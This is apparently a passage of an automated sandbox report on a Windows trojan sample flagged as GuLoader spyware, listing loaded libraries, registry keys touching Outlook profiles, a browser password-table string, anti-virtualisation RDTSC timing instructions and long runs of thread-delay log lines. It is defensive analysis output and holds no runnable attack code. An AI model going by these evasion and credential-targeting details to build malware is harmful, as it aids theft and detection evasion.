            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F20FA83_2_35F20FA8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F23F703_2_35F23F70
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F23F603_2_35F23F60
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F25F103_2_35F25F10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F236C03_2_35F236C0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F236B03_2_35F236B0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F296B83_2_35F296B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F256603_2_35F25660
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F256503_2_35F25650
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F286403_2_35F28640
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F22E103_2_35F22E10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F229B83_2_35F229B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2A9A03_2_35F2A9A0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F229A83_2_35F229A8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2F1383_2_35F2F138
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2F12A3_2_35F2F12A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F221083_2_35F22108
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F220FA3_2_35F220FA
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F270703_2_35F27070
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F270613_2_35F27061
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F218583_2_35F21858
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F200403_2_35F20040
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F200373_2_35F20037
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F248203_2_35F24820
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F248103_2_35F24810
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F213F03_2_35F213F0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F243C83_2_35F243C8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F243B93_2_35F243B9
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F263683_2_35F26368
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2A3523_2_35F2A352
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F263583_2_35F26358
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F27B4F3_2_35F27B4F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F23B183_2_35F23B18
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F23B083_2_35F23B08
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F25AB83_2_35F25AB8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F25AA83_2_35F25AA8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F232683_2_35F23268
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F252073_2_35F25207
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F252083_2_35F25208
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_3645D6E83_2_3645D6E8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_3645E8A83_2_3645E8A8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_364575E83_2_364575E8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_3645E89A3_2_3645E89A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: String function: 00402B3A appears 45 times
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646019179.0000000033017000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 4NG0guPiKA.exe
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4NG0guPiKA.exe
            Source: 4NG0guPiKA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile created: C:\Users\user\selvsikkerJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMutant created: NULL
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile created: C:\Users\user\AppData\Local\Temp\nst6785.tmpJump to behavior
            Source: 4NG0guPiKA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4NG0guPiKA.exe, 00000003.00000002.2649283790.000000003423D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4NG0guPiKA.exeVirustotal: Detection: 76%
            Source: 4NG0guPiKA.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile read: C:\Users\user\Desktop\4NG0guPiKA.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile created: C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI/Special instruction interceptor: Address: 3E0DFEC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI/Special instruction interceptor: Address: 227DFEC
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeRDTSC instruction interceptor: First address: 3DD035A second address: 3DD035A instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F962CDBC3ACh 0x00000008 test edi, 1CA0168Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ebx, 1DF5EBBAh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeRDTSC instruction interceptor: First address: 224035A second address: 224035A instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F962C73EA0Ch 0x00000008 test edi, 1CA0168Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ebx, 1DF5EBBAh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMemory allocated: 33210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMemory allocated: 32E50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598436Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598326Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 598097Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeWindow / User API: threadDelayed 8793Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeWindow / User API: threadDelayed 1060Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI coverage: 3.3 %
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7552Thread sleep count: 8793 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7552Thread sleep count: 1060 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556Thread sleep time: -599328s >= -30000sJump to behavior
